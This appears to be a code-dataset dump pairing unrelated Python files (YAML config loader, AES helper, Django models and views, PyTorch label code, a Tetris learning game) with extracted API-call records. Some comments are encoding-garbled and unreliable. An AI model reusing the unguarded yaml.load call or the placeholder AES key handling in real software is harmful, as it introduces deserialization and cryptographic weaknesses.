code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
|---|---|---|
# -*- coding:utf8 -*-
"""่ฏปๅ้
็ฝฎๆไปถไฟกๆฏ"""
import os
import yaml
BASEPATH = os.path.dirname(__file__)
def dbConfig():
data = open(os.path.join(BASEPATH, 'db.default.yaml'), 'r')
dict = yaml.load(data)
data.close()
return dict
if __name__ == '__main__':
print(dbConfig())
|
[
"os.path.dirname",
"yaml.load",
"os.path.join"
] |
[((71, 96), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (86, 96), False, 'import os\n'), ((190, 205), 'yaml.load', 'yaml.load', (['data'], {}), '(data)\n', (199, 205), False, 'import yaml\n'), ((131, 172), 'os.path.join', 'os.path.join', (['BASEPATH', '"""db.default.yaml"""'], {}), "(BASEPATH, 'db.default.yaml')\n", (143, 172), False, 'import os\n')]
|
'''
Created on Jan 3, 2014
@author: <NAME>
'''
from Crypto.Cipher import AES
import base64
# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
BLOCK_SZ = 14
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
SECRET = None
IV = None
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
def Encode(s):
cipher=AES.new(key=SECRET,mode=AES.MODE_CBC,IV=IV)
return EncodeAES(cipher, s)
def Decode(s):
cipher=AES.new(key=SECRET,mode=AES.MODE_CBC,IV=IV)
return DecodeAES(cipher, s)
|
[
"Crypto.Cipher.AES.new",
"base64.b64decode"
] |
[((838, 883), 'Crypto.Cipher.AES.new', 'AES.new', ([], {'key': 'SECRET', 'mode': 'AES.MODE_CBC', 'IV': 'IV'}), '(key=SECRET, mode=AES.MODE_CBC, IV=IV)\n', (845, 883), False, 'from Crypto.Cipher import AES\n'), ((941, 986), 'Crypto.Cipher.AES.new', 'AES.new', ([], {'key': 'SECRET', 'mode': 'AES.MODE_CBC', 'IV': 'IV'}), '(key=SECRET, mode=AES.MODE_CBC, IV=IV)\n', (948, 986), False, 'from Crypto.Cipher import AES\n'), ((774, 793), 'base64.b64decode', 'base64.b64decode', (['e'], {}), '(e)\n', (790, 793), False, 'import base64\n')]
|
#coding:utf-8
from django.db import models
from django.utils import timezone
from djangocms_text_ckeditor.fields import HTMLField
class News(models.Model):
creation_datetime = models.DateTimeField(default=timezone.now, verbose_name=u'Date de crรฉation')
update_datetime = models.DateTimeField(default=timezone.now, verbose_name=u'Date de mise ร jour')
publication_datetime = models.DateTimeField(default=timezone.now, verbose_name=u'Date de publication')
title = models.CharField(max_length=255, verbose_name=u'Titre')
subtitle = models.CharField(blank=True, max_length=255, verbose_name=u'Sous-titre')
theme = models.CharField(max_length=100, verbose_name=u'Thรจme')
body = HTMLField(verbose_name=u'Contenu')
image = models.ImageField(upload_to='news_news', verbose_name=u'Image')
link1 = models.URLField(blank=True, verbose_name=u'Lien 1')
link2 = models.URLField(blank=True, verbose_name=u'Lien 2')
link3 = models.URLField(blank=True, verbose_name=u'Lien 3')
class Meta:
verbose_name = u'Actualitรฉ'
verbose_name_plural = u'Actualitรฉs'
|
[
"djangocms_text_ckeditor.fields.HTMLField",
"django.db.models.URLField",
"django.db.models.CharField",
"django.db.models.ImageField",
"django.db.models.DateTimeField"
] |
[((183, 259), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now', 'verbose_name': 'u"""Date de crรฉation"""'}), "(default=timezone.now, verbose_name=u'Date de crรฉation')\n", (203, 259), False, 'from django.db import models\n'), ((282, 361), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now', 'verbose_name': 'u"""Date de mise ร jour"""'}), "(default=timezone.now, verbose_name=u'Date de mise ร jour')\n", (302, 361), False, 'from django.db import models\n'), ((389, 468), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now', 'verbose_name': 'u"""Date de publication"""'}), "(default=timezone.now, verbose_name=u'Date de publication')\n", (409, 468), False, 'from django.db import models\n'), ((486, 541), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'verbose_name': 'u"""Titre"""'}), "(max_length=255, verbose_name=u'Titre')\n", (502, 541), False, 'from django.db import models\n'), ((557, 629), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(255)', 'verbose_name': 'u"""Sous-titre"""'}), "(blank=True, max_length=255, verbose_name=u'Sous-titre')\n", (573, 629), False, 'from django.db import models\n'), ((642, 697), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'verbose_name': 'u"""Thรจme"""'}), "(max_length=100, verbose_name=u'Thรจme')\n", (658, 697), False, 'from django.db import models\n'), ((709, 743), 'djangocms_text_ckeditor.fields.HTMLField', 'HTMLField', ([], {'verbose_name': 'u"""Contenu"""'}), "(verbose_name=u'Contenu')\n", (718, 743), False, 'from djangocms_text_ckeditor.fields import HTMLField\n'), ((756, 819), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""news_news"""', 'verbose_name': 'u"""Image"""'}), "(upload_to='news_news', verbose_name=u'Image')\n", (773, 819), False, 'from django.db import models\n'), ((837, 888), 'django.db.models.URLField', 'models.URLField', ([], {'blank': '(True)', 'verbose_name': 'u"""Lien 1"""'}), "(blank=True, verbose_name=u'Lien 1')\n", (852, 888), False, 'from django.db import models\n'), ((901, 952), 'django.db.models.URLField', 'models.URLField', ([], {'blank': '(True)', 'verbose_name': 'u"""Lien 2"""'}), "(blank=True, verbose_name=u'Lien 2')\n", (916, 952), False, 'from django.db import models\n'), ((965, 1016), 'django.db.models.URLField', 'models.URLField', ([], {'blank': '(True)', 'verbose_name': 'u"""Lien 3"""'}), "(blank=True, verbose_name=u'Lien 3')\n", (980, 1016), False, 'from django.db import models\n')]
|
import torch
import torch.nn as nn
def label_broadcast(label_map,target):
# label_map is the prediction output through softmax operation
N, C, W, H = label_map.shape
# label_map = label_map.softmax(dim=1)
new_label = label_map.clone()
mask = (target.unsqueeze(1) != 255).detach()
new_mask = torch.zeros((N, 1, W, H)).cuda()
left = label_map[:, :, 0:W - 1, :] * mask[:, :, 0:W - 1, :]
right = label_map[:, :, 1:W, :] * mask[:, :, 1:W, :]
up = label_map[:, :, :, 0:H - 1] * mask[:, :, :, 0:H - 1]
down = label_map[:, :, :, 1:H] * mask[:, :, :, 1:H]
new_label[:, :, 1:W, :] = new_label[:, :, 1:W, :].clone() + left
new_label[:, :, 0:W - 1] = new_label[:, :, 0:W - 1].clone() + right
new_label[:, :, :, 1:H] = new_label[:, :, :, 1:H].clone() + down
new_label[:, :, :, 0:H - 1] = new_label[:, :, :, 0:H - 1].clone() + up
new_label = nn.Softmax(dim=1)(new_label)
new_mask[:, :, 1:W, :] += mask[:, :, 0:W - 1, :]
new_mask[:, :, 0:W - 1] += mask[:, :, 1:W, :]
new_mask[:, :, :,1:H] += mask[:, :, :, 0:H - 1]
new_mask[:, :, :, 0:H-1] += mask[:, :, :, 1:H]
new_mask = new_mask>=1
return new_label,new_mask.squeeze().detach()
|
[
"torch.zeros",
"torch.nn.Softmax"
] |
[((909, 926), 'torch.nn.Softmax', 'nn.Softmax', ([], {'dim': '(1)'}), '(dim=1)\n', (919, 926), True, 'import torch.nn as nn\n'), ((327, 352), 'torch.zeros', 'torch.zeros', (['(N, 1, W, H)'], {}), '((N, 1, W, H))\n', (338, 352), False, 'import torch\n')]
|
# Generated by Django 2.2.3 on 2019-07-22 13:33
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128, verbose_name='name')),
('sex', models.IntegerField(choices=[(1, 'male'), (2, 'female'), (0, 'unknown')], verbose_name='sex')),
('profession', models.CharField(max_length=128, verbose_name='job')),
('email', models.EmailField(max_length=254, verbose_name='Email')),
('qq', models.CharField(max_length=128, verbose_name='qq')),
('phone', models.CharField(max_length=128, verbose_name='phone')),
('status', models.IntegerField(choices=[(0, 'applying'), (1, 'passed'), (2, 'refused')], default=0, verbose_name='checkStatus')),
('created_time', models.DateTimeField(auto_now_add=True, verbose_name='createTime')),
],
options={
'verbose_name': 'StudentInf',
'verbose_name_plural': 'StudentInf',
},
),
]
|
[
"django.db.models.CharField",
"django.db.models.EmailField",
"django.db.models.AutoField",
"django.db.models.IntegerField",
"django.db.models.DateTimeField"
] |
[((303, 396), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (319, 396), False, 'from django.db import migrations, models\n'), ((420, 473), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'verbose_name': '"""name"""'}), "(max_length=128, verbose_name='name')\n", (436, 473), False, 'from django.db import migrations, models\n'), ((500, 597), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'choices': "[(1, 'male'), (2, 'female'), (0, 'unknown')]", 'verbose_name': '"""sex"""'}), "(choices=[(1, 'male'), (2, 'female'), (0, 'unknown')],\n verbose_name='sex')\n", (519, 597), False, 'from django.db import migrations, models\n'), ((627, 679), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'verbose_name': '"""job"""'}), "(max_length=128, verbose_name='job')\n", (643, 679), False, 'from django.db import migrations, models\n'), ((708, 763), 'django.db.models.EmailField', 'models.EmailField', ([], {'max_length': '(254)', 'verbose_name': '"""Email"""'}), "(max_length=254, verbose_name='Email')\n", (725, 763), False, 'from django.db import migrations, models\n'), ((789, 840), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'verbose_name': '"""qq"""'}), "(max_length=128, verbose_name='qq')\n", (805, 840), False, 'from django.db import migrations, models\n'), ((869, 923), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'verbose_name': '"""phone"""'}), "(max_length=128, verbose_name='phone')\n", (885, 923), False, 'from django.db import migrations, models\n'), ((953, 1074), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'choices': "[(0, 'applying'), (1, 'passed'), (2, 'refused')]", 'default': '(0)', 'verbose_name': '"""checkStatus"""'}), "(choices=[(0, 'applying'), (1, 'passed'), (2, 'refused')\n ], default=0, verbose_name='checkStatus')\n", (972, 1074), False, 'from django.db import migrations, models\n'), ((1105, 1171), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': '"""createTime"""'}), "(auto_now_add=True, verbose_name='createTime')\n", (1125, 1171), False, 'from django.db import migrations, models\n')]
|
from django.shortcuts import redirect, render, get_object_or_404
from .forms import ProfileForm, Hoodform, BusinessForm, PostForm
from django.contrib.auth.decorators import login_required
from .models import Hood, Profile, Business, Post
from urllib import request
from django.db.models import Q
# Create your views here.
@login_required(login_url='/accounts/login/')
def home(request):
current_user = request.user
# print(current_user)
if request.method == 'POST':
formhood = Hoodform(request.POST, request.FILES)
if formhood.is_valid():
upload = formhood.save(commit=False)
upload.admin = request.user.profile
# request.user.profile.save()
upload.save()
return redirect('home')
else:
formhood = Hoodform()
welcome = "welcome to the home page"
hoods = Hood.objects.all()
return render(request, 'hood/home.html', {"welcome": welcome, "formhood": formhood, "hoods": hoods})
@login_required(login_url='/accounts/login/')
def add_profile(request):
current_user = request.user
if request.method == 'POST':
formpro = ProfileForm(request.POST, request.FILES)
if formpro.is_valid():
upload = formpro.save(commit=False)
upload.user = current_user
upload.save()
return redirect('profile')
else:
formpro = ProfileForm()
return render(request, 'hood/add_profile.html', {"formpro": formpro})
@login_required(login_url='/accounts/login/')
def profile(request):
return render(request, 'hood/profile.html')
@login_required(login_url='/accounts/login/')
def neighborhood(request, hood_id):
current_user = request.user
# hood = get_object_or_404(Hood, pk=hood_id)
if request.method == 'POST':
formbiz = BusinessForm(request.POST, request.FILES)
if formbiz.is_valid():
addbiz = formbiz.save(commit=False)
addbiz.hood = hood_id
# upload.admin = current_user
# request.user.profile.save()
addbiz.save()
return redirect('hood')
else:
formbiz = BusinessForm()
if request.method == 'POST':
formpost = PostForm(request.POST, request.FILES)
if formpost.is_valid():
addpost = formpost.save(commit=False)
addpost.hoodwatch = hood_id
addpost.user = current_user
addpost.save()
return redirect('hood')
else:
formpost = PostForm()
# post = get_object_or_404(Post, hoodwatch=hood_id)
hood = get_object_or_404(Hood, pk=hood_id)
# business = get_object_or_404(Business, hood=hood_id)
return render(request, 'hood/hood.html', {"formbiz": formbiz, "formpost": formpost, "hood": hood})
@login_required(login_url='/accounts/login/')
def search(request):
query = request.GET.get('q')
print(query)
if query:
results = Hood.objects.filter(
Q(name__icontains=query))
else:
results = Hood.objects.all()
return render(request, 'pages/search.html', {'results': results})
|
[
"django.contrib.auth.decorators.login_required",
"urllib.request.GET.get",
"django.shortcuts.redirect",
"django.db.models.Q",
"django.shortcuts.get_object_or_404",
"django.shortcuts.render"
] |
[((326, 370), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""/accounts/login/"""'}), "(login_url='/accounts/login/')\n", (340, 370), False, 'from django.contrib.auth.decorators import login_required\n'), ((993, 1037), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""/accounts/login/"""'}), "(login_url='/accounts/login/')\n", (1007, 1037), False, 'from django.contrib.auth.decorators import login_required\n'), ((1492, 1536), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""/accounts/login/"""'}), "(login_url='/accounts/login/')\n", (1506, 1536), False, 'from django.contrib.auth.decorators import login_required\n'), ((1611, 1655), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""/accounts/login/"""'}), "(login_url='/accounts/login/')\n", (1625, 1655), False, 'from django.contrib.auth.decorators import login_required\n'), ((2808, 2852), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""/accounts/login/"""'}), "(login_url='/accounts/login/')\n", (2822, 2852), False, 'from django.contrib.auth.decorators import login_required\n'), ((896, 993), 'django.shortcuts.render', 'render', (['request', '"""hood/home.html"""', "{'welcome': welcome, 'formhood': formhood, 'hoods': hoods}"], {}), "(request, 'hood/home.html', {'welcome': welcome, 'formhood': formhood,\n 'hoods': hoods})\n", (902, 993), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((1426, 1488), 'django.shortcuts.render', 'render', (['request', '"""hood/add_profile.html"""', "{'formpro': formpro}"], {}), "(request, 'hood/add_profile.html', {'formpro': formpro})\n", (1432, 1488), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((1571, 1607), 'django.shortcuts.render', 'render', (['request', '"""hood/profile.html"""'], {}), "(request, 'hood/profile.html')\n", (1577, 1607), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((2713, 2808), 'django.shortcuts.render', 'render', (['request', '"""hood/hood.html"""', "{'formbiz': formbiz, 'formpost': formpost, 'hood': hood}"], {}), "(request, 'hood/hood.html', {'formbiz': formbiz, 'formpost': formpost,\n 'hood': hood})\n", (2719, 2808), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((2887, 2907), 'urllib.request.GET.get', 'request.GET.get', (['"""q"""'], {}), "('q')\n", (2902, 2907), False, 'from urllib import request\n'), ((3074, 3132), 'django.shortcuts.render', 'render', (['request', '"""pages/search.html"""', "{'results': results}"], {}), "(request, 'pages/search.html', {'results': results})\n", (3080, 3132), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((2603, 2638), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Hood'], {'pk': 'hood_id'}), '(Hood, pk=hood_id)\n', (2620, 2638), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((754, 770), 'django.shortcuts.redirect', 'redirect', (['"""home"""'], {}), "('home')\n", (762, 770), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((1352, 1371), 'django.shortcuts.redirect', 'redirect', (['"""profile"""'], {}), "('profile')\n", (1360, 1371), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((2109, 2125), 'django.shortcuts.redirect', 'redirect', (['"""hood"""'], {}), "('hood')\n", (2117, 2125), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((2469, 2485), 'django.shortcuts.redirect', 'redirect', (['"""hood"""'], {}), "('hood')\n", (2477, 2485), False, 'from django.shortcuts import redirect, render, get_object_or_404\n'), ((2990, 3014), 'django.db.models.Q', 'Q', ([], {'name__icontains': 'query'}), '(name__icontains=query)\n', (2991, 3014), False, 'from django.db.models import Q\n')]
|
import pygame as pg
import random, time, sys
import copy,numpy,pyautogui,math
# Define settings and constants
pyautogui.PAUSE = 0.03
pyautogui.FAILSAFE = True
# ๊ฒ์ ๊ฐ๋ก ์ธ๋ก ์ฌ์ด์ฆ
WINDOWWIDTH = 800
WINDOWHEIGHT = 640
#๋ธ๋ก ์ฌ์ด์ฆ,๊ฐ๋ก,์ธ๋ก ๊ธธ์ด
BOXSIZE = 30
BOXWIDTH = 5
BOXHEIGHT = 5
#๋ณด๋ ๊ฐ๋ก, ์ธ๋ก ๊ธธ์ด
BOARDWIDTH = 10
BOARDHEIGHT = 20
BLANK = '0' # ๋น ๊ณต๊ฐ
XMARGIN = int((WINDOWWIDTH - BOARDWIDTH * BOXSIZE) / 2)
YMARGIN = WINDOWHEIGHT - (BOARDHEIGHT * BOXSIZE) - 5
WHITE = (255, 255, 255) # ํ
์คํธ ํฐํธ ์์
BLACK = ( 0, 0, 0) #๋ฐฐ๊ฒฝ์
GRAY =(177,177,177) # ๋งต ์์ ์ ์์
#๋ธ๋ก ์์๋ค
RED = (155, 0, 0)
GREEN = ( 0, 155, 0)
BLUE = ( 0, 0, 155)
YELLOW = (155, 155, 0)
#๋ธ๋ก ์์์ ๊ทธ๋ผ๋ฐ์ด์
ํจ๊ณผ๋ฅผ ์ฃผ๊ธฐ ์ํ ์์๋ค
LIGHTRED = (175, 20, 20)
LIGHTGREEN = ( 20, 175, 20)
LIGHTBLUE = ( 20, 20, 175)
LIGHTYELLOW = (175, 175, 20)
# ๋ณด๋ ๊ทธ๋ฆฌ๊ณ ํ
์คํธ ์์๋ค
BORDERCOLOR = BLUE
BGCOLOR = BLACK
TEXTCOLOR = WHITE
TEXTSHADOWCOLOR = GRAY
#์ปฌ๋ฌ์ ํํํ๋ฅผ ํตํ ๋๋ค ์์ ์ง์ ๊ตฌํ
COLORS =(BLUE, GREEN, RED, YELLOW)
LIGHTCOLORS = (LIGHTBLUE, LIGHTGREEN, LIGHTRED, LIGHTYELLOW)
# ๋ธ๋ก ๋์์ธ
S_SHAPE_TEMPLATE = [['00000', '00000', '00110', '01100', '00000'],
['00000', '00100', '00110', '00010', '00000']]
Z_SHAPE_TEMPLATE = [['00000', '00000', '01100', '00110', '00000'],
['00000', '00100', '01100', '01000', '00000']]
I_SHAPE_TEMPLATE = [['00100', '00100', '00100', '00100', '00000'],
['00000', '00000', '11110', '00000', '00000']]
O_SHAPE_TEMPLATE = [['00000', '00000', '01100', '01100', '00000']]
J_SHAPE_TEMPLATE = [['00000', '01000', '01110', '00000',
'00000'], ['00000', '00110', '00100', '00100', '00000'],
['00000', '00000', '01110', '00010',
'00000'], ['00000', '00100', '00100', '01100', '00000']]
L_SHAPE_TEMPLATE = [['00000', '00010', '01110', '00000',
'00000'], ['00000', '00100', '00100', '00110', '00000'],
['00000', '00000', '01110', '01000',
'00000'], ['00000', '01100', '00100', '00100', '00000']]
T_SHAPE_TEMPLATE = [['00000', '00100', '01110', '00000',
'00000'], ['00000', '00100', '00110', '00100', '00000'],
['00000', '00000', '01110', '00100',
'00000'], ['00000', '00100', '01100', '00100', '00000']]
PIECES = {
'S': S_SHAPE_TEMPLATE,
'Z': Z_SHAPE_TEMPLATE,
'J': J_SHAPE_TEMPLATE,
'L': L_SHAPE_TEMPLATE,
'I': I_SHAPE_TEMPLATE,
'O': O_SHAPE_TEMPLATE,
'T': T_SHAPE_TEMPLATE
}
# Define learning parameters
alpha = 0.01
gamma = 0.9
MAX_GAMES = 20
explore_change = 0.5
weights = [-1, -1, -1, -30] # Initial weight vector
def Run_game(weights, explore_change):
board = get_blank_board() # ๋ณด๋ ์์ฑ
score = 0 # ์ค์ฝ์ด ์ด๊ธฐํ
level, fall_freq = get_level_and_fall_freq(score) # ๋ ๋ฒจ ๊ทธ๋ฆฌ๊ณ ๋ธ๋ก ๋จ์ด์ง๋ ์๋ ์ด๊ธฐํ
current_move = [0, 0] # ๋ธ๋ก์ ์ต์ ํ ์์ง์
falling_piece = get_new_piece() # ๋จ์ด์ง๋ ๋ธ๋ก์ ๋ฐ๊ณ
next_piece = get_new_piece() # ๋ค์ ๋ธ๋ก ๋ง๋ ๋ค
last_fall_time = time.time() # 1์ด๋ง๋ค ๋ธ๋ก์ด ๋จ์ด์ง๋ค
while True:
if falling_piece is None:
# ๋จ์ด์ง๋ ๋ธ๋ก์ด ์์ผ๋ฉด ๋ค์ ๋ธ๋ก์ ๋ฐ๋๋ค
falling_piece = next_piece
next_piece = get_new_piece()
last_fall_time = time.time() # reset last_fall_time
if not is_valid_position(board, falling_piece): # ๋ณด๋๋ณด๋ค ๋ธ๋ก์ด ๋ ๋๊ฒ ์์์ ๊ฒฝ์ฐ
# can't fit a new piece on the board, so game over
return score, weights, explore_change # ๊ฒ์ ์ค๋ฒ๋ก ์ธํ ์ค์ฝ์ด, ํ์ต ๊ฐ ์ํ๋ฅผ ๋ฆฌํด
current_move, weights = gradient_descent(board, falling_piece, weights,
explore_change)
if explore_change > 0.001:
explore_change = explore_change * 0.99
else:
explore_change = 0
current_move = make_move(current_move)
for event in pg.event.get(): # event handling loop
if event.type == pg.QUIT:
check = False
sys.exit()
if event.type == pg.KEYDOWN:
if (event.key == pg.K_LEFT or event.key == pg.K_a) and is_valid_position(
board, falling_piece, adj_x=-1): # ์ผ์ชฝ ๋ฐฉํฅํค
falling_piece['x'] -= 1
elif (event.key == pg.K_RIGHT or event.key == pg.K_d) and is_valid_position(
board, falling_piece, adj_x=1): # ์ค๋ฅธ์ชฝ ๋ฐฉํฅํค
falling_piece['x'] += 1
elif (event.key == pg.K_UP or event.key == pg.K_w): # ์ ๋ฐฉํฅํค
falling_piece['rotation'] = (falling_piece['rotation'] + 1) % len(PIECES[falling_piece['shape']])
if not is_valid_position(board, falling_piece):
falling_piece['rotation'] = (falling_piece['rotation'] - 1) % len(PIECES[falling_piece['shape']])
elif (event.key == pg.K_DOWN or event.key == pg.K_s): # ์๋ ๋ฐฉํฅํค
if is_valid_position(board, falling_piece, adj_y=1):
falling_piece['y'] += 1
elif event.key == pg.K_SPACE: # ์คํ์ด์ค ํค
for i in range(1, BOARDHEIGHT):
if not is_valid_position(board, falling_piece, adj_y=i):
break
falling_piece['y'] += i - 1
if time.time() - last_fall_time > fall_freq: # ๋ธ๋ก์ด ์ ์๊ฐ์ ๋ง๊ฒ ๋จ์ด์ง ๊ฒฝ์ฐ
if not is_valid_position(board, falling_piece, adj_y=1):
add_to_board(board, falling_piece) # ๋ณด๋์ ํด๋น ๋ธ๋ก์ ์ฑ์ด๋ค
lines, board = remove_complete_lines(board) # ์ง์์ง ๋ผ์ธ ์๋ฅผ ๋ฐ์
score += lines * lines # ์ค์ฝ์ด์ ์ฆ๊ฐ
level, fall_freq = get_level_and_fall_freq(score) # ๋ ๋ฒจ๊ณผ ๋จ์ด์ง๋ ์๋ ์กฐ์
falling_piece = None # ๋จ์ด์ง๋ ๋ธ๋ก์ ํ์ฌ ์๋ค
else:
# 1์ด ๊ฐ๊ฒฉ์ผ๋ก ๋ธ๋ก์ด ๋จ์ด์ง๊ฒ y ์ขํ ๋ณํ
falling_piece['y'] += 1
last_fall_time = time.time()
GAME.fill(BGCOLOR)
draw_board(board)
draw_status(score, level, current_move,games_completed)
draw_next_piece(next_piece)
if falling_piece is not None:
draw_piece(falling_piece)
pg.display.update()
FPS.tick(30) # 30 ํ๋ ์์ผ๋ก ๊ฒ์ ๋์
def make_text_objs(text, font, color):
surf = font.render(text, True, color) # ํฐํธ ๋ ๋๋ง
return surf, surf.get_rect()
def show_text_screen(text): # ํ๋ฉด์ ํด๋นํ๋ ๋ด์ฉ ํ
์คํธ ์ถ๋ ฅ
title_surf, title_rect = make_text_objs(text, SubFont, TEXTSHADOWCOLOR)
title_rect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2))
GAME.blit(title_surf, title_rect)
title_surf, title_rect = make_text_objs(text, SubFont, TEXTCOLOR)
title_rect.center = (int(WINDOWWIDTH / 2) - 3, int(WINDOWHEIGHT / 2) - 3)
GAME.blit(title_surf, title_rect)
press_key_surf, press_key_rect = make_text_objs('Please wait to continue.',
SubFont, TEXTCOLOR)
press_key_rect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2) + 100)
GAME.blit(press_key_surf, press_key_rect)
pg.display.update()
FPS.tick()
time.sleep(0.5)
def get_level_and_fall_freq(score):
level = int(score / 3) # ์ค์ฝ์ด 3๋ฐฐ์ ๋ง๋ค ๋ ๋ฒจ ์ฆ๊ฐ
if level < 6: # ๋ ๋ฒจ 6์ ๊น์ง ๋จ์ด์ง๋ ์๋ ๊ฐ์
fallsp = 0.6 - (level * 0.1) + 0.1
else: # 6 ์ดํ๋ก ์ผ์ ์๋๋ก ์ ์ง
fallsp = 0.2
return level, fallsp # ๋ ๋ฒจ ๊ณผ ๋จ์ด์ง๋ ์๋ ๊ฐ ๋ฆฌํด
def get_new_piece():
# ๋๋คํจ์๋ก ์๋ก์ด ๋ธ๋ก ์ง์
shape = random.choice(list(PIECES.keys()))
new_piece = {
'shape': shape,
'rotation': random.randint(0,
len(PIECES[shape]) - 1),
'x': int(BOARDWIDTH / 2) - int(BOXWIDTH / 2),
'y': -2, # start it above the board (i.e. less than 0)
'color': random.randint(1,
len(COLORS) - 1)
}
return new_piece
def add_to_board(board, piece):
for x in range(BOXWIDTH):
for y in range(BOXHEIGHT):
if PIECES[piece['shape']][piece['rotation']][y][x] != BLANK and x + piece['x'] < 10 and y + piece['y'] < 20: # ๋ธ๋ก์ด ๋จ์ด์ง๋ ค๋ ํด๋น ๋ณด๋ ๊ตฌ๊ฐ์ด ๋น ๊ณต๊ฐ์ด ์๋ ๊ฒฝ์ฐ
board[x + piece['x']][y + piece['y']] = piece['color']# ๋ธ๋ก๊ณผ ๊ฐ์ ์์์ผ๋ก ํด๋น ๋ณด๋ ๊ตฌ๊ฐ์ ์ฑ์ด๋ค
def get_blank_board():
# ์ ํด๋ ๋ณด๋ ๊ฐ๋ก ์ธ๋ก ์ฌ์ด์ฆ ๋งํผ ๋ณด๋ ๋ฐฐ์ด ์์ฑ
board = []
for _ in range(BOARDWIDTH):
board.append(['0'] * BOARDHEIGHT)
return board
def is_on_board(x, y):
return x >= 0 and x < BOARDWIDTH and y < BOARDHEIGHT # ๋ธ๋ก์ด ๋ณด๋ ์์ ์์ ๊ฒฝ์ฐ true๋ฅผ ๋ฆฌํด
def is_valid_position(board, piece, adj_x=0, adj_y=0):
for x in range(BOXWIDTH):
for y in range(BOXHEIGHT):
is_above_board = y + piece['y'] + adj_y < 0
if is_above_board or PIECES[piece['shape']][piece['rotation']][y][x] == BLANK: # ๋ธ๋ก ๋จ์ด์ง๋ ๊ตฌ๊ฐ์ด ๋น ๊ณต๊ฐ์ผ ๊ฒฝ์ฐ
continue # ๋จ์ ๋ธ๋ก ๊ด๋ จ ์ ๊ฒ์ ์งํํ๋ค
if not is_on_board(x + piece['x'] + adj_x, y + piece['y'] + adj_y):
return False # ๋ธ๋ก์ด ๋ณด๋ ํ์ ๋ฒ์ด๋๋ ค ํ๋ค๋ฉด false๋ฅผ ๋ฆฌํด
if board[x + piece['x'] + adj_x][y + piece['y'] + adj_y] != BLANK:
return False # ๋ธ๋ก ๋จ์ด์ง๋ ๊ตฌ๊ฐ์ด ๋น ๊ณต๊ฐ์ด ์๋ ๊ฒฝ์ฐ false๋ฅผ ๋ฆฌํด
return True
def is_complete_line(board, y):
for x in range(BOARDWIDTH):
if board[x][y] == BLANK: # ๋ณด๋์ ๋ผ์ธ์ ๋น ๊ณต๊ฐ์ด ์์ ๊ฒฝ์ฐ
return False #false๋ฅผ ๋ฆฌํด
return True # ๊ทธ ๋ฐ๋์ผ ๊ฒฝ์ฐ true ๋ฆฌํด
def remove_complete_lines(board):
lines_removed = 0
y = BOARDHEIGHT - 1
while y >= 0:
if is_complete_line(board, y):
for pull_down_y in range(y, 0, -1):
for x in range(BOARDWIDTH):
board[x][pull_down_y] = board[x][pull_down_y - 1] # ์ง์์ง๋ ๋ณด๋ ๋ผ์ธ ์์ ์์ธ ๋ธ๋ก๋ค์ ๋ฐ์ผ๋ก ๋ด๋ฆฐ๋ค
for x in range(BOARDWIDTH):
board[x][0] = BLANK # ๋น ๊ณต๊ฐ ์์ด ๋ผ์ธ์ด ๋ธ๋ก์ผ๋ก ๊ฐ๋์ฐฐ ๊ฒฝ์ฐ ๊ทธ ๋ผ์ธ์ ๋ณด๋๋ค์ ๋น์ด๋ค
lines_removed += 1# ์ง์์ง ๋ผ์ธ ์ ์นด์ดํธ ๊ฐ ์ฆ๊ฐ
else:
y -= 1
return lines_removed, board
